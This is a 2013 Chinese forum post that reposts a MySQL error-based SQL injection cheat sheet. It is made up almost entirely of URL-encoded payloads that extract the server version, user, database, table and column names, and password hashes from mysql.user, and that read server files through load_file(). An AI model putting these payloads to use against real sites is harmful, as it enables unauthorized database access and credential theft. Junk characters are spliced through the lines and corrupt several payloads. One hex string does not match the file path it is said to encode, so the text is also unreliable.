Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

; H6 X; P, u. Q; O0 b
Mysql暴错注入参考（pdf），每天一贴。。。

/ w6 B6 K* J. GMySql Error Based Injection Reference
+ q2 P3 ]: O9 V0 Q) [1 j; ?$ j[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
: q% h) P& q# b# h  D: d# KMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
1 B- Q& N9 R; r小部分版本使用name_const()时会报错.可以用给出的Method.2测试
7 M% G2 B# _) k- \' L1 q查询版本:
4 u5 u8 a; b- j' C0 l7 ]Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
  b& A$ w: o5 m9 ?join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
: b. D6 h$ y. J9 J+ K- r3 kup by a)b)
/ P/ T* [# |6 J3 u$ P$ z7 c查询当前用户:
4 X' e9 |6 u  c2 K( e: E" QMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
6 c4 T3 v% w! ~- Wand(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
9 t0 Y) o+ ^, o0 d1 I) iMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
) r: `8 \9 {5 P# S6 SMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
6 p+ B6 F: P1 {$ v, Z( U7 aor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
0 j' d4 C6 G4 ]- Q! I; ~% a- l- q顺序替换
; f5 m# i: n' F2 o& g* d5 T爆指定库数目:
9 b8 O2 s6 _5 ?' jand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
8 h! M# S: k, O* A0 `able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
# C9 T( t, _. ^& ]) U5 t: ^% X. }able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
# o# b$ J0 D3 B, }5 M0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
  v; P+ }2 t  M/ u& r* x+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
1 I0 O! A, J0 }2 o2 U! @0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
) M: L5 P( \: O6 e" C/ X依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
4 _, \% ?4 t; T" t0 ]* M+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
依次暴内容:
1 g* x5 w6 J! |; Band+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
0 L0 c1 Q$ `6 k6 ^2 J; dand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
$ e$ h% Y& U; m# i: zfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
% v1 Y8 X8 E- c9 g' }; |2 h4 Z0 ZThx for reading.
" k1 U" i' i! [6 r
! l% s. z  E7 P1 Z$ q4 P. c6 S6 e不要下载也可以，
' A) p( i$ N3 a7 v